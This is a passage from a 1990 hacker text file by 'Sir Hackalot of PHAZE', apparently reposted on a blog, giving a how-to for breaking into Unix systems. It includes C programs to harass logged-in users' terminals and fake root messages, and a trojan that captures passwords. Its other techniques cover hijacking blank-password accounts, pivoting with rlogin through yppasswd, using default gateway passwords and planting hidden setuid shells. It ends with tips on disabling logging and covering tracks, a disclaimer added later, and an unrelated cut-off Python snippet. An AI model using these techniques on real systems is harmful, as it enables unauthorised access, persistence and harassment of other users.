printf("Bus Error - Core Dumped\n");
exit(1);
}

The program gets the login, and the password, and appends it to
a file (/wherever/whateverfile), and creates the file if it can,
and if its not there. That is just an example. Network Annoyances
come later.

IV. Odd systems

There may be systems you can log in to with no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..). Don't give up here. Some systems will
let you login as root, but give you a menu which will allow you to add an
account. However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell. You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting. HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100. The "editing" usually only involves changing the password
on the account. If an account has a * for a password, the standard passwd
program which changes programs, will say no pw exists, and will ask you to
enter one. (wallah! You have just freed an account for yourself. Usually
bin and sys have a * for a password). If one exists you'll have to enter
the old Password (I hope you know it!) for that account. Then, you are
in the same boat as before. (BTW -- These wierd systems are usually
Xenix/386, Xenix/286, or Altos/286)
With word processors, usually you can select the load command,
and when the word processor prompts for a file, you can select the passwd
file, to look for open accounts, or at least valid ones to hack. An example
would be the informix system. You can get a word processor with that such
as Samna word, or something, and those Lamers will not protect against
shit like that. Why? The Passwd file HAS to be readable by all for the most
part, so each program can "stat" you. However, word processors could be made
to restrict editing to a directory, or set of directories. Here is an
example:

$ id
uid=100(sirhack) gid=100(users)
$ sword
(word processor comes up)
(select LOAD A FILE)
: /etc/passwd

(you see: )
root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
...

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

You can usually tell when you'll get a menu. Sometimes on UNIX
SYSTEM V, when it says TERM = (termtype), and is waiting for
you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
Not much to say about this. all it is, is when every password field
in the password file has an "x" or just a single character. What
that does is screw you, becuase you cannot read the shadowed password
file, only root can, and it contains all the passwords, so you will
not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
the interrupt handler doesn't catch, and things like that. However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything. Now I will Talk about Internet.



--->>> InterNet <<<---
Why do I want to talk about InterNet? Well, because it is a prime
example of a TCP/IP network, better known as a WAN (Wide-Area-Network).
Now, mainly you will find BSD systems off of the Internet, or SunOS, for
they are the most common. They may not be when System V, Rel 4.0, Version
2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump
from one computer to another once you are logged in. What happens is
EACH system has a "yello page password file". Better known as yppasswd.
If you look in there, and see blank passwords you can use rsh, rlogin, etc..
to slip into that system. One system in particular I came across had a
a yppasswd file where *300* users had blank passwords in the Yellow Pages.
Once I got in on the "test" account, ALL I had to do was select who I wanted
to be, and do: rlogin -l user (sometimes -n). Then it would log me onto
the system I was already on, through TCP/IP. However, when you do this,
remember that the yppasswd only pertains to the system you are on at
the time. To find accounts, you could find the yppasswd file and do:

% cat yppasswd grep ::

Or, if you can't find yppasswd..

% ypcat passwd grep ::

On ONE system (which will remain confidential), I found the DAEMON account
left open in the yppasswd file. Not bad. Anyway, through one system
on the internet, you can reach many. Just use rsh, or rlogin, and look
in the file: /etc/hosts for valid sites which you can reach. If you get
on to a system, and rlogin to somewhere else, and it asks for a password,
that just means one of two things:

A. Your account that you have hacked on the one computer is on the target
computer as well. Try to use the same password (if any) you found the
hacked account to have. If it is a default, then it is definitly on the
other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it
was like typing in your login at a "login: " prompt. You may not exist on
the other machine. Try "rlogin -l login_name", or rlogin -n name..
sometimes, you can execute "rwho" on another machine, and get a valid
account.

Some notes on Internet servers. There are "GATEWAYS" that you can get into
that will allow access to MANY internet sites. They are mostly run off
a modified GL/1 or GS/1. No big deal. They have help files. However,
you can get a "privilged" access on them, which will give you CONTROL of
the gateway.. You can shut it down, remove systems from the Internet, etc..
When you request to become privileged, it will ask for a password. There is
a default. The default is "system". I have come across *5* gateways with
the default password. Then again, DECNET has the same password, and I have
come across 100+ of those with the default privileged password. CERT Sucks.
a Gateway that led to APPLE.COM had the default password. Anyone could
have removed apple.com from the internet. Be advised that there are many
networks now that use TCP/IP.. Such as BARRNET, LANET, and many other
University networks.

--** Having Fun **--

Now, if nothing else, you should atleast have some fun. No, I do not mean
go trashing hardrives, or unlinking directories to take up inodes, I mean
play with online users. There are many things to do. Re-direct output
to them is the biggie. Here is an example:
$ who
loozer tty1
sirhack tty2
$ banner You Suck >/dev/tty1
$
That sent the output to loozer. The TTY1 is where I/O is being performed
to his terminal (usually a modem if it is a TTY). You can repetitiously
banner him with a do while statement in shell, causing him to logoff. Or
you can get sly, and just screw with him. Observe this C program:

#include
#include
#include

main(argc,argument)
int argc;
char *argument[];
{
int handle;
char *pstr,*olm[80];
char *devstr = "/dev/";
int acnt = 2;
FILE *strm;
pstr = "";
if (argc == 1) {
printf("OL (OneLiner) Version 1.00 \n");
printf("By Sir Hackalot [PHAZE]\n");
printf("\nSyntax: ol tty message\n");
printf("Example: ol tty01 You suck\n");
exit(1);
}
printf("OL (OneLiner) Version 1.0\n");
printf("By Sir Hackalot [PHAZE]\n");
if (argc == 2) {
strcpy(olm,"");
printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
printf("Enter one Here => ");
gets(olm);
}
strcpy(pstr,"");
strcat(pstr,devstr);
strcat(pstr,argument[1]);
printf("Sending to: [%s]\n",pstr);
strm = fopen(pstr,"a");
if (strm == NULL) {
printf("Error writing to: %s\n",pstr);
printf("Cause: No Write Perms?\n");
exit(2);
}
if (argc == 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());
fprintf(strm,"%s\n",olm);
fclose(strm);
printf("Message Sent.\n");
exit(0);
}
if (argc > 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());
while (acnt <= argc - 1) {
fprintf(strm,"%s ",argument[acnt]);
acnt++;
}
fclose(strm);
printf("Message sent!\n");
exit(0);
}
}

What the above does is send one line of text to a device writeable by you
in /dev. If you try it on a user named "sirhack" it will notify sirhack
of what you are doing. You can supply an argument at the command line, or
leave a blank message, then it will prompt for one. You MUST supply a
Terminal. Also, if you want to use ?, or *, or (), or [], you must not
supply a message at the command line, wait till it prompts you. Example:

$ ol tty1 You Suck!
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Sending to: [/dev/tty1]
Message Sent!
$
Or..
$ ol tty1
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Dummy! You Forgot to Supply a ONE LINE MESSAGE!
Enter one here => Loozer! Logoff (NOW)!! ^G^G
Sending to: [/dev/tty1]
Message Sent!
$

You can even use it to fake messages from root. Here is another:


/*
* Hose another user
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define NMAX sizeof(ubuf.ut_name)

struct utmp ubuf;
struct termio oldmode, mode;
struct utsname name;
int yn;
int loop = 0;
char *realme[50] = "Unknown";
char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];
char *histtya, *ttyname(), *strrchr(), *getenv();
int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
FILE *tf;

main(argc, argv)
int argc;
char *argv[];
{
register FILE *uf;
char c1, lastc;
int goodtty = 0;
long clock = time((long *) 0);
struct tm *localtime();
struct tm *localclock = localtime( &clock );
struct stat stbuf;
char psbuf[20], buf[80], window[20], junk[20];
FILE *pfp, *popen();

if (argc < 2) {
printf("usage: hose user [ttyname]\n");
exit(1);
}
him = argv[1];

if (argc > 2)
histtya = argv[2];
if ((uf = fopen("/etc/utmp", "r")) == NULL) {
printf("cannot open /etc/utmp\n");
exit(1);
}
cuserid(me);
if (me == NULL) {
printf("Can't find your login name\n");
exit(1);
}
mytty = ttyname(2);
if (mytty == NULL) {
printf("Can't find your tty\n");
exit(1);
}
if (stat(mytty, &stbuf) < 0) {
printf("Can't stat your tty -- This System is bogus.\n");
}
if ((stbuf.st_mode&02) == 0) {
printf("You have write permissions turned off (hehe!).\n");
}

if (histtya) {
if (!strncmp(histtya, "/dev/", 5))
histtya = strrchr(histtya, '/') + 1;
strcpy(histty, "/dev/");
strcat(histty, histtya);
}
while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) {
if (ubuf.ut_name[0] == '\0')
continue;
if (!strncmp(ubuf.ut_name, him, NMAX)) {
logcnt++;
if (histty[0]==0) {
strcpy(histty, "/dev/");
strcat(histty, ubuf.ut_line);
}
if (histtya) {
if (!strcmp(ubuf.ut_line, histtya))
goodtty++;
}
}
}
fclose(uf);
if (logcnt==0) {
printf("%s not found! (Not logged in?)\n", him);
exit(1);
}

if (histtya==0 && logcnt > 1) {
printf("%s logged more than once\nwriting to %s\n", him, histty+5);
}
if (access(histty, 0) < 0) {
printf("No such tty? [%s]\n",histty);
exit(1);
}
signal(SIGALRM, timout);
alarm(5);
if ((tf = fopen(histty, "w")) == NULL)
goto perm;
alarm(0);
if (fstat(fileno(tf), &stbuf) < 0)
goto perm;
if (geteuid() != 0 && (stbuf.st_mode&02) == 0)
goto perm;
ioctl(0, TCGETA, &oldmode); /* save tty state */
ioctl(0, TCGETA, &mode);
sigs(eof);
uname(&name);
if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1;
if (yn == 1 ) {
fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me);
fclose(tf);
printf("Critical Error Handler: %s running conflicting process\n",him);
exit(1);
}
fflush(tf);
mode.c_cc[4] = 1;
mode.c_cc[5] = 0;
mode.c_lflag &= ~ICANON;
ioctl(0, TCSETAW, &mode);
lastc = '\n';


printf("Backspace / Spin Cursor set lose on: %s\n",him);
while (loop == 0) {
c1 = '\b';
write(fileno(tf),&c1,1);
sleep(5);
fprintf(tf,"\\\b\b/\b-\b+\b");
fflush(tf);
}




perm:
printf("Write Permissions denied!\n");
exit(1);
}

timout()
{

printf("Timeout opening their tty\n");
exit(1);
}

eof()
{
printf("Bye..\n");
ioctl(0, TCSETAW, &oldmode);
exit(0);
}

ex()
{
register i;
sigs(SIG_IGN);
i = fork();
if (i < 0) {
printf("Try again\n");
goto out;
}
if (i == 0) {
sigs((int (*)())0);
execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0);
exit(0);
}
while(wait((int *)NULL) != i)
;
printf("!\n");
out:
sigs(eof);
}

sigs(sig)
int (*sig)();
{
register i;
for (i=0; signum[i]; i++)
signal(signum[i], sig);
}



What the above is, is a modified version of the standard write command.
What it does, is spin the cursor once, then backspace once over the
screen of the user it is run on. All though, it does not physically affect
input, the user thinks it does. therefore, he garbles input. The sleep(xx)
can be changed to make the stuff happen more often, or less often.
If you put your login name in the "YOURNAMEHERE" slot, it will protect you
from getting hit by it, if someone off a Public access unix leeches the
executable from your directory.
You could make a shorter program that does almost the same thing, but
you have to supply the terminal, observe:

/* Backspace virus, by Sir Hackalot [Phaze] */
#include
#include
main(argc,argv)
char *argv[];
int argc;
{
int x = 1;
char *device = "/dev/";
FILE *histty;
if (argc == 1) {
printf("Bafoon. Supply a TTY.\n");
exit(1);
}
strcat(device,argv[1]);
/* Make the filename /dev/tty.. */
histty = fopen(device,"a");
if (histty == NULL) {
printf("Error opening/writing to tty. Check their perms.\n");
exit(1);
}
printf("BSV - Backspace virus, By Sir Hackalot.\n");
printf("The Sucker on %s is getting it!\n",device);
while (x == 1) {
fprintf(histty,"\b\b");
fflush(histty);
sleep(5);
}
}

Thats all there is to it. If you can write to their tty, you can use this on
them. It sends two backspaces to them every approx. 5 seconds. You
should run this program in the background. (&). Here is an example:

$ who
sirhack tty11
loozer tty12
$ bsv tty12&
[1] 4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!
$

Now, it will keep "attacking" him, until he loggs of, or you kill the process
(which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line. However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right. Else, you'll see a ^M at the end of every
line. I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to
get your imagination going, provided you are a C programmer. You can annoy
users other ways. One thing you can do is screw up the user's mailbox.
The way to do this is to find a binary file (30k or bigger) on the system
which YOU have access to read. then, do this:

$ cat binary_file mail loozer

or

$ mail loozer < binary file

That usually will spilt into 2 messages or more. The 1st message will
have a from line.. (from you ..), but the second WILL NOT! Since it does
not, the mail reader will keep exiting and giving him an error message until
it gets fixed.. The way to fix it is to go to the mail box that got hit
with this trick (usually only the one who got hit (or root) and do this),
and edit the file, and add a from line.. like
From username..

then it will be ok. You can screw the user by "cat"ing a binary to his tty.
say Loozer is on tty12. You can say..
$ cat binary_file >/dev/tty12
$
It may pause for a while while it outputs it. If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
$
And he will probably logoff. You can send the output of anything to his
terminal. Even what YOU do in shell. Like this:
$ sh >/dev/tty12
$
You'll get your prompts, but you won't see the output of any commands, he
will...
$ ls
$ banner Idiot!
$ echo Dumbass!
$
until you type in exit, or hit ctrl-d.


There are many many things you can do. You can fake a "write" to someone
and make them think it was from somewhere on the other side of hell. Be
creative.

When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell. If you get
someone to run a trojan that does that, you can run the suid, and log their
ass off by killing their mother PID. (kill -9 whatever). Or, you can
lock them out by adding "kill -1 0" to their .profile. On the subject of
holes, always look for BAD suid bits. On one system thought to be invincible
I was able to read/modify everyone's mail, because I used a mailer that had
both the GroupID set, and the UserID set. When I went to shell from it,
the program instantly changed my Effective ID back to me, so I would not be
able to do anything but my regular stuff. But it was not designed to change
the GROUP ID back. The sysop had blundered there. SO when I did an ID
I found my group to be "Mail". Mailfiles are readble/writeable by the
user "mail", and the group "mail". I then set up a sgid (set group id) shell
to change my group id to "mail" when I ran it, and scanned important mail,
and it got me some good info. So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it. Some tips on doing so
is:
1. Don't give it out. If the sysadm sees that joeuser logged in 500
times in one night....then....
2. Don't stay on for hours at a time. They can trace you then. Also
they will know it is irregular to have joeuser on for 4 hours
after work.
3. Don't trash the system. Don't erase important files, and don't
hog inodes, or anything like that. Use the machine for a specific
purpose (to leech source code, develop programs, an Email site).
Dont be an asshole, and don't try to erase everything you can.
4. Don't screw with users constantly. Watch their processes and
run what they run. It may get you good info (snoop!)
5. If you add an account, first look at the accounts already in there
If you see a bunch of accounts that are just 3 letter abbrv.'s,
then make yours so. If a bunch are "cln, dok, wed" or something,
don't add one that is "joeuser", add one that is someone's
full initials.

6. When you add an account, put a woman's name in for the
description, if it fits (Meaning, if only companies log on to the
unix, put a company name there). People do not suspect hackers
to use women's names. They look for men's names.
7. Don't cost the Unix machine too much money. Ie.. don't abuse an
outdial, or if it controls trunks, do not set up a bunch of dial
outs. If there is a pad, don't use it unless you NEED it.
8. Don't use x.25 pads. Their usage is heavily logged.
9. Turn off acct logging (acct off) if you have the access to.
Turn it on when you are done.
10. Remove any trojan horses you set up to give you access when you
get access.
11. Do NOT change the MOTD file to say "I hacked this system" Just
thought I'd tell you. Many MANY people do that, and lose access
within 2 hours, if the unix is worth a spit.
12. Use good judgement. Cover your tracks. If you use su, clean
up the sulog.
13. If you use cu, clean up the cu_log.
14. If you use the smtp bug (wizard/debug), set up a uid shell.
15. Hide all suid shells. Here's how:
goto /usr
(or any dir)
do:
# mkdir ".. "
# cd ".. "
# cp /bin/sh ".whatever"
# chmod a+s ".whatever"
The "" are NEEDED to get to the directory .. ! It will not show
up in a listing, and it is hard as hell to get to by sysadms if
you make 4 or 5 spaces in there (".. "), because all they will
see in a directory FULL list will be .. and they won't be able to
get there unless they use "" and know the spacing. "" is used
when you want to do literals, or use a wildcard as part of a file
name.
16. Don't hog cpu time with password hackers. They really don't work
well.

17. Don't use too much disk space. If you archieve something to dl,
dl it, then kill the archieve.
18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get
into systems...". Wrong. (Yo Pheds! You reading this??). It IS true
when you are dealing with WAN's, such as telenet, tyment, and the Internet,
but not with local computers not on those networks. Here's the story:

Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck. Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix. Now, since they get paid by
the hour usaually when setting one up, they spread it out over days....
during these days, the system is WIDE open (if it has a dialin). Get
in and add yourself to passwd before the seal it off (if they do..).
Then again, after the machine is set up, they leave the defaults on the
system. Why? The company needs to get in, and most VARs cannot use
unix worth a shit, all they know how to do is set it up, and that is ALL.
Then, they turn over the system to a company or business that USUALLY
has no-one that knows what they hell they are doing with the thing, except
with menus. So, they leave the system open to all...(inadvertedly..),
because they are not competant. So, you could usually get on, and create
havoc, and at first they will think it is a bug.. I have seen this
happen ALL to many times, and it is always the same story...
The VAR is out for a fast buck, so they set up the software (all they know
how to do), and install any software packages ordered with it (following
the step by step instructions). Then they turn it over to the business
who runs a word processor, or database, or something, un aware that a
"shell" or command line exists, and they probably don't even know root does.
So, we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and Simultask...
which will lead to even more holes. You'll find systems local to you
that are easy as hell to get into, and you'll see what I mean. These
VARs are really actually working for us. If a security problem arises
that the business is aware of, they call the VAR to fix it... Of course,
the Var gets paid by the hour, and leaves something open so you'll get in
again, and they make more moolahhhh.


You can use this phile for whatever you want. I can't stop you. Just
to learn unix (heh) or whatever. But its YOUR ass if you get caught.
Always consider the penalties before you attempt something. Sometimes
it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like
it. I have left out a LOT of techniques, and quirks, specifically to get
you to learn SOMETHING on your own, and also to retain information so
I will have some secrets. You may pass this file on, UNMODIFIED, to any
GOOD H/P BBS. Sysops can add things to the archieve to say where
it was DL'd from, or to the text viewer for the same purpose. This is
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.

-Sir Hackalot of PHAZE
1990.
Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

How to Get files from the directory - One more method

 import os import openpyxl # Specify the target folder folder_path = "C:/Your/Target/Folder"  # Replace with the actual path # Cre...